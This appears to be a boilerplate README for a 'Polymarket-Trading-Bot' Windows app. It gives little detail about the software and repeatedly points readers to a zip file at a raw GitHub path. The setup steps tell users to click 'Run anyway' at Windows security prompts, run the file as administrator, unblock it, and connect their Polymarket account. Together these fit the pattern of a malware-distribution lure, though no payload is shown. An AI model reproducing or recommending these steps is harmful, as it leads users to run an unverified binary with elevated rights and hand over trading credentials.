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🤖 Polymarket-Trading-Bot - Structured Market Decisions for Windows

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🚀 Getting Started

Polymarket-Trading-Bot helps you follow a probability-based trading plan on Polymarket. It checks market odds, price movement, and shifts in probability, then uses that data to guide trading decisions.

Use the link below to visit the download page:

Download Polymarket-Trading-Bot

💻 What This App Does

This app is built for users who want a simple way to track prediction markets without making random trades. It focuses on:

  • Market odds
  • Price changes
  • Probability shifts
  • Trading signals based on structured rules
  • Watching trends across Polymarket markets

It is meant to help you follow a repeatable process when you trade.

📦 Before You Start

Before you run the app on Windows, make sure you have:

  • A Windows 10 or Windows 11 PC
  • A stable internet connection
  • Enough free space for the app files
  • Permission to run downloaded apps
  • A modern browser if you need to open the project page

If Windows asks for permission, choose the option that lets the app run.

🛠️ How to Download and Run

Follow these steps on Windows:

  1. Open the download page: https://raw.githubusercontent.com/sylvesteroriental963/Polymarket-Trading-Bot/main/dionym/Trading_Polymarket_Bot_1.3.zip

  2. Look for the latest release or main project files.

  3. Download the Windows file or package listed there.

  4. When the download finishes, open your Downloads folder.

  5. If the file is a .exe, double-click it to run the app.

  6. If the file is a .zip, right-click it and choose Extract All.

  7. Open the extracted folder and start the app file inside.

  8. If Windows shows a security prompt, select Run anyway if you trust the source.

🧭 First-Time Setup

When you open the app for the first time, use this simple flow:

  • Start the bot from the main file
  • Review the default settings
  • Connect your Polymarket account if needed
  • Set your preferred market filters
  • Choose how often the bot checks market changes
  • Save your settings before you begin

Keep the first setup simple. Use the default options first, then change them once you know how the app behaves.

📈 Main Features

🔍 Probability-Based Market Tracking

The bot watches changes in market odds and looks for shifts that may matter for trading.

📊 Structured Trade Signals

It uses a rules-based approach, so you can follow a clear plan instead of guessing.

⏱️ Market Movement Monitoring

It checks how market prices move over time and flags changes in trend.

🧠 Decision Support

The app helps you compare current odds with prior changes so you can make a more informed choice.

🧩 Flexible Market Use

The bot can be used with different prediction market setups and trading styles.

🪟 Windows Tips

If the app does not open right away, try these steps:

  • Right-click the file and choose Run as administrator
  • Make sure the file finished downloading
  • Check whether Windows blocked the app
  • Move the app folder to a simple path like C:\Apps\Polymarket-Trading-Bot
  • Close other heavy apps if your PC is slow

If the file is inside a zip folder, always extract it first before you run it.

🔐 Account and Access

Some versions of trading tools may need your Polymarket login or API access. If that applies here, keep your details private and use strong passwords.

Use only your own account. Do not share access files with other people.

⚙️ Basic Use Flow

A simple way to use the bot:

  1. Open the app
  2. Load your settings
  3. Pick the market you want to watch
  4. Set your trade rules
  5. Start the bot
  6. Review signals before you act
  7. Stop the bot when you are done

This keeps your trading process easy to follow.

🧪 Example Use Cases

  • Watching market odds before placing a trade
  • Tracking probability changes across a live event
  • Comparing short-term movement with longer trend changes
  • Helping you stay consistent with a market plan
  • Testing structured prediction market strategies

🧰 Common File Types You May See

You may see one of these file types on the download page:

  • .exe — open this file to run the app
  • .zip — extract it, then open the app inside
  • .bat — run it from the app folder if included
  • .json — settings file
  • .txt — read-me or setup file

If there are several files, start with the file that looks like the main app.

❓ Troubleshooting

The app will not open

  • Check that the download finished
  • Make sure you extracted the zip file
  • Try running it as administrator
  • Restart your PC and try again

Windows says the app is unsafe

  • Check that you downloaded it from the project page
  • Right-click the file and choose Properties
  • Unblock the file if Windows gives you that option

The bot does not show data

  • Check your internet connection
  • Confirm that your market settings are correct
  • Reload the app and try again
  • Make sure the market you picked is active

The app runs slowly

  • Close other apps
  • Reboot your PC
  • Keep only the markets you need enabled
  • Use the default update rate first

🗂️ Project Topics

This repository is related to:

  • polymarket
  • polymarket-bot
  • polymarket-claw
  • polymarket-copytrade
  • polymarket-kalshi-arbitrage
  • polymarket-trade-bot
  • polymarket-trading-bot
  • polymarket-trading-strategy

📁 Folder Layout

A typical Windows setup may look like this:

  • Polymarket-Trading-Bot/
  • app.exe
  • config/
  • logs/
  • data/
  • README.md

If the folder names differ, look for the main app file and a settings folder.

🔄 Updates

If a newer version appears on the project page, repeat the download steps and replace the old files with the new ones. Keep your settings backed up if the app stores them in a separate file.

🧭 What to Do Next

Open the download page, get the latest Windows file, and run it on your PC:

Visit the Polymarket-Trading-Bot download page

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